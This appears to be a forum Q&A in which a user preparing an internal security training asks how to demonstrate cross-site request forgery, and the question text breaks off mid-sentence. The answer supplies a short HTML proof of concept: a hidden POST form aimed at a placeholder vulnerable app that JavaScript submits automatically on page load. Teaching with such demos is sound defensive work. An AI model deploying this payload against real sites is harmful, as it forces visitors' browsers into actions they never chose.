How to demonstrate a CSRF attack

Question

I\'m doing an introduction to the web security to some other people in our enterprise, and I want to show some example to have more impact.

For this I\'ve created a

Answer 1

On the "other host" (the attacker) you just create a FORM with method POST whose action (i.e. where the form is submitted) is your vulnerable app. Then you submit it with javascript on that page.

Like this:

<html><body>
  <form name="csrf_form" action="http://VULNERABLE_APP/csrf.php" method="POST">
    <input type="hidden" name="csrf_param" value="POST_ATTACK">
  </form>

  <script type="text/javascript">document.csrf_form.submit();</script>
</body></html>

This will submit a POST to your vulnerable app from the attacker's host, when you open that page.